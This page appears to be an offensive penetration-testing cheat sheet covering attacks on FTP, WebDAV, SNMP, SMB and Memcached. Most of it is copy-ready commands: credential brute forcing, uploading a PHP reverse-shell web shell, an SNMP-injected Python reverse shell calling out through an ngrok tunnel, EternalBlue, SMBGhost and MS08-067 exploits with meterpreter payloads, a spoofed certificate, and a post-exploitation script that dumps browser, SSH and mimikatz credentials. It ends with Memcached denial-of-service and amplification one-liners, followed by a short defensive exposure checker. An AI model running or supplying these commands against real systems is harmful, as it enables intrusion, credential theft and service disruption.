Network Configuration

Last updated 1 month ago

Check List

Cheat Sheet

FTP

Identify FTP

nmap -p 21 -sS -sV --mtu 5000 --script banner $WEBSITE

Anonymous Login

nmap -p 21 -sS -sV --mtu 5000 --script ftp-anon $WEBSITE

Brute Force

nmap -p 21 -sS -sV --mtu 5000 --script ftp-brute $WEBSITE

Browser Login

ftp://anonymous:anonymous@$TARGET

Download Files

wget --ftp-user=anonymous --ftp-password=anonymous ftp://$TARGET:21

CLI Login

ftp
open $TARGET 21

USER

> anonymous

PASS

> anonymous

FTP Mode

passive

Download File

get file.txt

Brute Force

hydra -V \
      -L /usr/share/seclists/Usernames/sap-default-usernames.txt \
      -P /usr/share/seclists/Passwords/darkweb2017-top10000.txt ftp://$TARGET:21

Recon Version

msfconsole -qx "
    use auxiliary/scanner/ftp/ftp_version;
    set RHOSTS $WEBSITE;
    run;
    exit"

Anonymous Login

msfconsole -qx "
    use auxiliary/scanner/ftp/anonymous;
    set RHOSTS $WEBSITE;
    run;
    exit"

Brute Force

msfconsole -qx "
    use auxiliary/scanner/ftp/ftp_login;
    set RHOSTS $WEBSITE;
    set USERPASS_FILE /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt;
    run;
    exit"

WebDAV

Identify WebDAV

nmap -p 80,443 \
     -sS -sV --mtu 5000 \
     --script http-methods,http-webdav-scan $WEBSITE

Scan WebDAV

msfconsole -qx "
    use auxiliary/scanner/http/webdav_scanner;
    set PATH /webdav;
    set RHOSTS $WEBSITE;
    run;
    exit"

Brute Force

hydra -V \
      -L /usr/share/seclists/Usernames/sap-default-usernames.txt \
      -P /usr/share/seclists/Passwords/darkweb2017-top10000.txt \
      $TARGET http-get /webdav/

Scan WebDAV

davtest -url $WEBSITE

Upload Shell

davtest -url $WEBSITE \
        -uploadfile /usr/share/webshells/php/php-reverse-shell.php \
        -uploadloc shell.php

Listening

nc -lvnp 1234

Cadaver Login

cadaver $WEBSITE/webdav

PUT Web shell

put /usr/share/webshells/php/php-reverse-shell.php

Listening

nc -lvnp 1234

SNMP

Identify SNMP

nmap -p 161 -sU -sV --mtu 5000 --script snmp-info $WEBSITE

Brute Force

nmap -p 161 -sU -sV --mtu 5000 --script snmp-brute $WEBSITE

Enumerate SNMP Public

snmpwalk -v1 -c public $TARGET

Brute Force Community Strings

onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt $TARGET

SNMPv1

snmpset -v1 -c private $TARGET OID s "unk9vvn"

SNMPv2

snmpset -v2c -c private $TARGET sysName.0 s "unk9vvn"

Start Ngrok

ngrok http 4444 >/dev/null 2>&1 &

Define ENV Ngrok

NGHOST=$(curl -s http://127.0.0.1:4040/api/tunnels | jq -r .tunnels[0].public_url | sed 's|https://||')

Inject RCE

snmpset -m +NET-SNMP-EXTEND-MIB \
        -v 2c \
        -c SuP3RPrivCom90 $TARGET 'nsExtendStatus."command10"' = createAndGo 'nsExtendCommand."command10"' = /usr/bin/python3 'nsExtendArgs."command10"' = '-c "import sys,socket,os,pty;s=socket.socket();s.connect((\"$NGHOST\",443));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/sh\")"'

Execute Command

snmpwalk -v2c -c SuP3RPrivCom90 $TARGET NET-SNMP-EXTEND-MIB::nsExtendObjects

Enumerate SNMP Public

msfconsole -qx "
    use auxiliary/scanner/snmp/snmp_enum;
    set RHOSTS $WEBSITE;
    run;
    exit"

Enumerate SNMP Private

msfconsole -qx "
    use auxiliary/scanner/snmp/snmp_enum;
    set RHOSTS $WEBSITE;
    set COMMUNITY private;
    run;
    exit"

Enumerate Windows Users

msfconsole -qx "
    use auxiliary/scanner/snmp/snmp_enumusers;
    set RHOSTS $WEBSITE;
    run;
    exit"

Enumerate File Shares

msfconsole -qx "
    use auxiliary/scanner/snmp/snmp_enumshares;
    set RHOSTS $WEBSITE;
    run;
    exit"

SMB

Identify SMB

nmap -p 139,445 \
     -sS -sV --mtu 5000 \
     --script smb-protocols,smb-os-discovery,smb2-capabilities $WEBSITE

Recon Vulns

nmap -p 139,445 \
     -sS -sV --mtu 5000 \
     --script smb-vuln-*,smb-double-pulsar-backdoor $WEBSITE

Brute Force

nmap -p 139,445 \
     -sS -sV --mtu 5000 \
     --script smb-brute $WEBSITE

Enumerate Users and Shares

nmap -p 139,445 \
     -sS -sV --mtu 5000 \
     --script smb-enum-users,smb-enum-shares $WEBSITE

Enumerate Domains and Groups

nmap -p 139,445 \
     -sS -sV --mtu 5000 \
     --script smb-enum-domains,smb-enum-groups $WEBSITE

Enumerate Services and Processes

nmap -p 139,445 \
     -sS -sV --mtu 5000 \
     --script smb-enum-services,smb-enum-processes $WEBSITE

Enumerate Host

netexec smb $TARGET

Enumerate Shares

enum4linux -a $TARGET

Scan NetBIOS Names

nbtscan -r $TARGET/24

User Enumeration and Null Sessions

smbclient -N -L //$TARGET

Null Session via rpcclient

rpcclient -U "" $TARGET

Detect Version

msfconsole -qx "
    use auxiliary/scanner/smb/smb_version;
    set RHOSTS $TARGET;
    run;
    exit"

Enumerate Users

msfconsole -qx "
    use auxiliary/scanner/smb/smb_enumusers;
    set RHOSTS $TARGET;
    run;
    exit"

Enumerate Shares

msfconsole -qx "
    use auxiliary/scanner/smb/smb_enumshares;
    set RHOSTS $TARGET;
    run;
    exit"

Credential Dumps

msfconsole -qx "
    use auxiliary/scanner/smb/impacket/secretsdump;
    set RHOSTS $TARGET;
    run;
    exit"

Credential Brute Force

msfconsole -qx "
    use auxiliary/scanner/smb/smb_login;
    set RHOSTS $TARGET;
    set SMBUser Administrator;
    set PASS_FILE /usr/share/seclists/Passwords/darkweb2017-top100.txt;
    run;
    exit"

Detect EternalBlue

msfconsole -qx "
    use auxiliary/scanner/smb/smb_ms17_010;
    set RHOSTS $TARGET;
    run;
    exit"

Start Ngrok

ngrok http 4444 >/dev/null 2>&1 &

Define ENV Ngrok

NGHOST=$(curl -s http://127.0.0.1:4040/api/tunnels | jq -r .tunnels[0].public_url | sed 's|https://||')

Cert Spoof

rm -rf /home/$USER/.msf4/loot/*
msfconsole -qx "
    use auxiliary/gather/impersonate_ssl;
    set RHOSTS google.com;
    run;
    exit"

Define ENV Cert

CERT=/home/$USER/.msf4/loot/$(find /home/$USER/.msf4/loot/ -type f -name "*.pem" -printf "%f\n" | head -n 1)

Post-EXP

cat > /tmp/post-exp.rc << EOF
getprivs
getsystem
run multi/gather/firefox_creds DECRYPT=true
run multi/gather/filezilla_client_cred
run multi/gather/ssh_creds
run multi/gather/thunderbird_creds
run multi/gather/wlan_geolocate
mimikatz
privilege::debug
sekurlsa::logonpasswords
lsadump::sam
bg
EOF

EternalBlue Exploit (Win 7 to 10 - Win Server 2008 to 2012)

msfconsole -qx "
    use exploit/windows/smb/ms17_010_eternalblue;
    set PAYLOAD windows/x64/meterpreter/reverse_https;
    set RHOSTS $TARGET;
    set LHOST $NGHOST;
    set LPORT 443;
    set ReverseListenerBindAddress 127.0.0.1;
    set ReverseListenerBindPort 4444;
    set HandlerSSLCert $CERT;
    set StagerVerifySSLCert true;
    set StageEncoder true;
    set AutoRunScript /tmp/post-exp.rc;
    run -j"

Doublepulsar Exploit (Win 7 to 10 - Win Server 2008 to 2012)

msfconsole -qx "
    use exploit/windows/smb/smb_doublepulsar_rce;
    set PAYLOAD windows/x64/meterpreter/reverse_https;
    set RHOSTS $TARGET;
    set LHOST $NGHOST;
    set LPORT 443;
    set ReverseListenerBindAddress 127.0.0.1;
    set ReverseListenerBindPort 4444;
    set HandlerSSLCert $CERT;
    set StagerVerifySSLCert true;
    set StageEncoder true;
    set AutoRunScript /tmp/post-exp.rc;
    run -j"

SMBGhost Exploit (Win 10)

msfconsole -qx "
    use exploit/windows/smb/cve_2020_0796_smbghost;
    set PAYLOAD windows/x64/meterpreter/reverse_https;
    set RHOSTS $TARGET;
    set LHOST $NGHOST;
    set LPORT 443;
    set ReverseListenerBindAddress 127.0.0.1;
    set ReverseListenerBindPort 4444;
    set HandlerSSLCert $CERT;
    set StagerVerifySSLCert true;
    set StageEncoder true;
    set AutoRunScript /tmp/post-exp.rc;
    run -j"

Net API Exploit (Win XP)

msfconsole -qx "
    use exploit/windows/smb/ms08_067_netapi;
    set PAYLOAD windows/meterpreter/reverse_hop_http;
    set RHOSTS $TARGET;
    set LHOST $NGHOST;
    set LPORT 443;
    set ReverseListenerBindAddress 127.0.0.1;
    set ReverseListenerBindPort 4444;
    set HandlerSSLCert $CERT;
    set StagerVerifySSLCert true;
    set StageEncoder true;
    set AutoRunScript /tmp/post-exp.rc;
    run -j"

Memcached

Identify Memcached

nmap -p 11211 -sS -sV --mtu 5000 --script memcached-info $WEBSITE

Get Version

echo "version" | nc -vn -w 1 $TARGET 11211

Get Status

echo "stats" | nc -vn -w 1 $TARGET 11211

Get Slabs

echo "stats slabs" | nc -vn -w 1 $TARGET 11211

Get Items

echo "stats items" | nc -vn -w 1 $TARGET 11211

Get Key Names

echo "stats cachedump 1 10" | nc -vn -w 1 $TARGET 11211

Get Info Saved

echo "get $ITEM" | nc -vn -w 1 $TARGET 11211

Denial of Service

for i in {1..10000}; do echo "set key$i 0 0 1024" | nc $TARGET 11211; done

DDoS Amplification

echo -e "\x00\x00\x00\x00\x00\x01\x00\x00stats\n" | nc -u -q 1 $TARGET 11211

Get Stats

memcstat --servers=$TARGET

Get all items

memcdump --servers=$TARGET

Get info inside the item(s)

memccat --servers=$TARGET $ITEM1 $ITEM2 $ITEM3

Extract Slabs

msfconsole -qx "
    use auxiliary/gather/memcached_extractor;
    set RHOSTS $TARGET;
    run;
    exit"

Denial of Service

msfconsole -qx "
    use auxiliary/dos/misc/memcached;
    set RHOSTS $TARGET;
    run;
    exit"
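Added defensive check, not part of the original cheat sheet: the script below speaks the same memcached text protocol the nc one-liners above drive, but only asks for "stats settings" and reports the exposures those commands depend on (UDP enabled, bound to every interface, no SASL auth). The sample reply and the finding names are constructed here as assumptions; fetch_settings runs the same parse against a live host.

```python
import socket

# Constructed sample reply to "stats settings" (illustrative, not captured).
SAMPLE_SETTINGS = (
    "STAT maxbytes 67108864\r\n"
    "STAT maxconns 1024\r\n"
    "STAT tcpport 11211\r\n"
    "STAT udpport 11211\r\n"
    "STAT inter NULL\r\n"
    "STAT auth_enabled_sasl no\r\n"
    "END\r\n"
)

def parse_stats(reply: str) -> dict:
    """Turn 'STAT <name> <value>' lines (up to END) into a dict."""
    settings = {}
    for line in reply.splitlines():
        if line == "END":
            break
        parts = line.split(" ", 2)
        if len(parts) == 3 and parts[0] == "STAT":
            settings[parts[1]] = parts[2]
    return settings

def assess(settings: dict) -> list:
    """Name the exposures the nc one-liners above depend on (assumed labels)."""
    findings = []
    # UDP answers 'stats' to spoofed sources: the amplification vector (-U 0 disables it).
    if settings.get("udpport", "0") != "0":
        findings.append("udp-enabled")
    # No bind address means every interface; prefer -l 127.0.0.1 or a private address.
    if settings.get("inter", "NULL") in ("NULL", "0.0.0.0", "::"):
        findings.append("bound-all-interfaces")
    # Without SASL anyone who reaches the port can read and set keys.
    if settings.get("auth_enabled_sasl", "no") != "yes":
        findings.append("no-auth")
    return findings

def fetch_settings(host: str, port: int = 11211, timeout: float = 2.0) -> dict:
    """Live check over TCP, the same text protocol the nc commands drive."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(b"stats settings\r\n")
        buf = b""
        while not buf.endswith(b"END\r\n"):
            chunk = s.recv(4096)
            if not chunk:
                break
            buf += chunk
    return parse_stats(buf.decode("ascii", "replace"))
```

An empty findings list from assess(fetch_settings(host)) means the instance has UDP off, a non-wildcard bind address and SASL on; anything else is what the commands in this section would reach.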
